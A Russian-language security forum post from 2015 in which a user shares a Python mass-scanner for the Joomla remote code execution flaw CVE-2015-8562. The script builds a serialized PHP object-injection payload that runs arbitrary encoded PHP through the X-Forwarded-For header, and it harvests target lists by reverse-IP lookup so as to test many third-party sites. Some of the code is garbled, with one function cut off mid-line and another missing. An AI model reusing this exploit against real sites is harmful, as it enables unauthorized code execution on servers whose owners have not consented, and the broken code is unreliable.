HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 19.12.2015, 23:12
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Выкладываю свою поделку для проверки списка сайтов на CVE-2015-8562. Скрипт работает в двух режимах: можно указать домен, по которому будет осуществлен reverse ip lookup и получен список сайтов для проверки или же задать файл со списком сайтов. В случае если сайт уязвим, программа выведет "exploitable". Есть возможность результат записать в лог-файл. Сильно не пинайте, посоны, код корявенький, работает тоже не шибко шустро. Да, и еще, обратите внимание на название заголовка, который используется - сейчас он еще работает там, где уже фильтруется UA.

Код:
Code:
'''
  joomla rce masschek for CVE-2015-8562
  bb special for antichat.ru
  thx to: Gary@Sec-1 ltd, antichat community
  19.12.2015   
'''
import sys
import re
import requests
import getopt

message = "--"
def get_url(url, user_agent):
   global message         
   headers = {
   #'User-Agent': user_agent   
   'x-forwarded-for': user_agent
   }
   response = None
   try:
     cookies = requests.get(url, timeout=15, headers=headers).cookies

     for _ in range(3):
       response = requests.get(url, timeout=15, headers=headers,cookies=cookies)   
   except Exception as ex:
     #print ex.message
     message = "Error: " + str(ex.message)
   if response:
     #print "got response"
     #print response.content
     return response.content
   return None
   
def php_str_noquotes(data):
  "Convert string to chr(xx).chr(xx) for use in php"
  encoded = ""
  for char in data:
  encoded += "chr({0}).".format(ord(char))
  return encoded[:-1]
def generate_payload(php_payload):
  php_payload = "eval({0})".format(php_str_noquotes(php_payload))
  terminate = '\xf0\xfd\xfd\xfd';
  exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
  injected_payload = "{};JFactory::getConfig();exit".format(php_payload)   
  exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
  exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
  return exploit_template
def get_site_list(domain):
   url = "http://viewdns.info/reverseip/?host=" + domain  + "&t=1"
   headers = {
   
   'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'   
     
   }

   #print url
   try:
     response = requests.get(url, timeout=15, headers = headers)
     text =  response.content
     #print text
     sites = re.findall("\s+(.*?)"
   print "Options:"
   print "-d, --domain   domain for reverse lookup on viewdns.info"
   print "-f, --file   file with site list to check"
   print "-l, --log   save result to log file"
   print "Example: "+sys.argv[0]+" --file domains.txt --log output.txt"

pl = generate_payload("phpinfo();")
#text = get_url(host, pl)

#write log?   
write_log = False
log_file = ""
domain = ""
read_file = ""
opts, args = getopt.getopt(sys.argv[1:], "f:d:l:", ["file=","domain=","log="]);

for opt, arg in opts:
   if opt in("-f", "--file"):
     read_file = arg
   elif opt in("-d", "--domain"):
     domain = arg
   elif opt in("-l", "--log"):
     log_file = arg
     write_log = True

if(domain and read_file):
   usage()
   exit()

if(domain == "" and read_file == ""):
   usage()
   exit()

if(write_log == True):
   
   fh = open(log_file, "w")
   fh.close()

#use file or get domains from viewdns.info

if(domain):
   sites = get_site_list(domain)
   #print sites
   print "Total " +str(len(sites)) + " sites to check"
   check_sites(sites, pl, write_log, log_file)
elif(read_file):
   fh = open(read_file,"r")
   data = fh.readlines()
   fh.close()
   print "Total " +str(len(data)) + " sites to check"
   check_sites(data, pl, write_log, log_file)
Надеюсь кому-нибудь пригодится.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ